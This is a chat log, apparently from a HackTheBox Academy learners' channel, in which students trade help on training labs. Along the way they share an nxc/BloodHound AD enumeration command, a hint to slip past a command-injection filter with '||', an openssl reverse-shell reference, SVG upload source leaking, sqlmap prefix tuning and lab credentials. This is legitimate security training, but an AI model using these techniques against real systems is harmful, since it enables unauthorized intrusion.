would love to be a fly on that virtual wall, watching an endless loop of "ok, before I can do that I need you to send a $100 amazon gift card to this address." "Sure! Before I can do that, I need you to send a $100 amazon gift card to this address." "OK, I'm on it. Before I can do that..."

https://tenor.com/view/evilwizardcat-gif-16657991134775678911

✌️

anyone know why?

you need a break :)

--boundhound

You can read the error message

i know but its a valid command

--bloodhound is a valid command, yeah

bloodhound not boundhound

LMAO my bad HAHAHA

someone need to take a nap

Freud would have something to say about this, probably

Hello! I would like to know if the activities in NTFS vs. Share Permissions section in Windows Fundamentals can be done with the vpn in my attacker machine alone without the pwnbox?

yea been doing whole day

mbmb

I tried to use to pwnbox but it can't connect to the share somehow

Same goes to my own attach machine I can't list the shares via smbclient

if I'm using pwnbox how would i download the resources under the module

nvm

just emailed it to myself

Email?

Just copy the download link

the pwnbox has internet @tired atlas

Yes

I got that

anyone available for help with this assessment

nxc ldap IP-u 'USER' -p 'PASS' --bloodhound --collection All --dns-server IP
why doesnt this work? is it because the internal host can't connect back to me?

have u tried the old version?

im using ligolo btw

No because it starts to run pwnbox inside the pwnbox which fucks it up, if I open the module in Firefox

is there a way to PrivEsc to root if you know open ldap admin creds?

nxc and bloodhound ingestors are too weak with DNS , check rusthound

why does HTB say Linux Privilege Escalation takes 8 hours?

It got 28 sections..

Okay because sharphound won’t work either

there's also rusthound.exe

Okay thank you for the info, been looking for other data collector but didn’t notice rusthound

damn

I'm able to see access the internal server for the injection skill assessment, having issues reading files. any help greatly apprecaited

@torn skiff zip the folder and certutil maybe ?

Hey, I have a question. I feel like my learning level isn't increasing. I've finished the htb web course and I'd like to practice on the web but I've noticed that without a write-up I can't finish a box. Do you have any advice for me in terms of methodologies or is it just try harder?

Can anyone help me on command injections skills assessment?

I think i have found the right spot to inject, as I'm getting the "Malicious File" Error.

And i tried many different ways to be able to get the flag, but to no success. I think the main issue is I couldn't escape to the subshell so the command can be executed, so its being recognized as just regular input. A nudge would be helpful.

What is the question

What web course were you doing? Also if you take good notes on the modules related to the boxes and copy common commands you know you will use, and consistently have a work period. Your going to notice the difference in your level, enough so to complete your first box with minimal to no help. But its going to take a while.

Same hard stuck

Web Academy.

I don't see that, could you take a picture and send to me?

I'm Tallking about HTB Academy.

So what path or modules were you doing?

All the modules. I finished in december.

You finished all modules on htb??

I found it

Yeah for the Bug Bounty Hunter.

So if you notice

You get an error when running anything

this means you need the OR statement

|| is or in bash, so try that 😉 No malicious should be found

If you took good notes on them, go back on them, you should be able to find some bugs, maybe you rushed through the modules.

I will try that, thanks.

https://tenor.com/view/hasbulla-hasbulla-magomedov-hello-hi-hasbulla-hi-gif-16517238265127501476

@fading basin 👋

Can I dm? Its not working for me.

sure

accept friend request

then you can dm me

Hey all, in the AD Enumeration and Attacks > Kerberoasting - from Windows module

The credentials provided for the lab portion are not working for me. Even tried to confirm with smbclient but still getting NT Status Logon Failure. I've tried to reset the box as well but nothing. Any advise would be appreciated!

Hey folks, on the fundamental module “macOS fundamentals” how much do we need access to a Mac box? Like - I get that it’s good to have one to follow along and practice on, but can you complete the module without access to a box?

I’m trying to get by on cubes I earn from completing modules so I don’t want to start a module if I can’t earn the cubes back from it.

I’m able to access the internal host. But I can’t read files

Which credentials are you using?

htb-student:Academy_student_AD!

According to my notes it's forend's credentials that are used for the Kerberoasting in that section, are those creds to SSH into a host and work from there?

lmfaooooo

wth

whats next? fax it? xddd

Interesting because htb asks us to "RDP to 10.129.4.246 (ACADEMY-EA-MS01) with user "htb-student" and password "Academy_student_AD!"" for the initial foothold

its a windows box

Lol might be mixing it up with the Linux section then, what's your rdp command?

I've tried to rdp manually and confirm the creds with smbclient but they seem wrong

What's your command though, for either of those things?

What happens when you rdp to it with those creds?

What error

And can you show the command you’re using

Pwnbox is not working.. local VPN is not working, whats happenning??

Contact support

👋

figured it out, a simple /cert:ignore for some reason under xfreerdp worked despite the creds not working in smbclient or rdesktop

got it to work with xfreerdp and cert:ignore for some odd reason. Thank you though!

Can anyone help me on file Uploads Skills assessment? I'm able to upload php web shell, but don't know where its going. So now I'm trying to leak upload.php file source code, but when I try to use the .svg file to do it it just gives me the base64 of the command not source code so I need a nudge.

I was stuck at that part and managed to get through that way too, I'm pretty sure its because in the error it says invalid certification and that its not trustworthy so it cancels the rdp connection, but you can bypass it with cert:ignore

Hello! I was doing SQLmap Attack Tuning section and when i got stuck i looked at the hint. I can't understand what i was supposed to try doing to understand that i need to set preffix this way?

Hello guys

I am doing attacking common applications

In the part of attacking tomcat

on intro to sliver c2 which endpoint shoudl i go to run shellcode.aspx
https://academy.hackthebox.com/module/241/section/2846

The first question was what is a valid username and I wrote it is Tomcat

And what is the password question?

I tried everything

But nothing worked

I decided to go to the walk through

The password was root

I answered the question with that password and it worked

But when I tried to login with it it didn't work

I restarted the machine but same issue

What the problem I spent 2 hrs

On a silly target

try lowercase

I did that

It is so frustrating

You were supposed to visualize the query by looking at the errors and trying with other prefixes with -v flag, to come to the realization that that's the reason why sqlmap wasn't working cause it needed a proper prefix. But since in general its a difficult question it provides with a hint since most people had trouble without it.

Okay, ill try. Thank you!

I don't like the idea of simply giving the anwer. They could've provide the method to get it by your own at least.

for what its worth, i also had the same questions when i went through this a few months ago.

can someone explain to me wtf

https://gtfobins.github.io/gtfobins/openssl/#sudo

revshell using openssl

yeah, it isn't, reversing

oh good point

it still executes with john's token even tho I am running openssl with sudo

Good Afternoon people. Someone can help me with this? i cannot run this command and i don't know because

dir C:\tools

what

is that processhacker in tools?

is it a file or directory?

cmd

check if it is there, could be a typo

potentially it is ProcessHacker.exe

judging by the names of the other tools in the sheet

anybody else working on the Active Directory Enumeration & Attacks module?

its saying "For the portion of this section that requires interaction from a Linux host (mssqlclient.py and evil-winrm) you can open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!"

when I try to ssh to 172.16.5.225 from the RDP machine, its not accepting the
credentials.

but i don't know because i cannot run

then dir C:\Tools

like sora said originally

support asked for a screenshot, which I sent them and then my request was closed stating they cannot help with content questions

not sure if theres anything wrong with the command?

Does the nmap firewall evasion hard lab

https://academy.hackthebox.com/module/19/section/119

require the -T 0 type options? this will take forever if so... the previous two did not

can you send the section in dms? im pretty sure i had this problem but fixed it

already i did Sora

It requires the correct Scan type you dont gotta do -T0

ok thx

it is not a command, it is a folder, right?

for what its worth i remember when i did the AD modules the ssh password changes around a lot

make complete sure you're using the correct password and not assuming its the same one from previous sections

this is a command bro

C:\Tools\ProcessHacker is not a command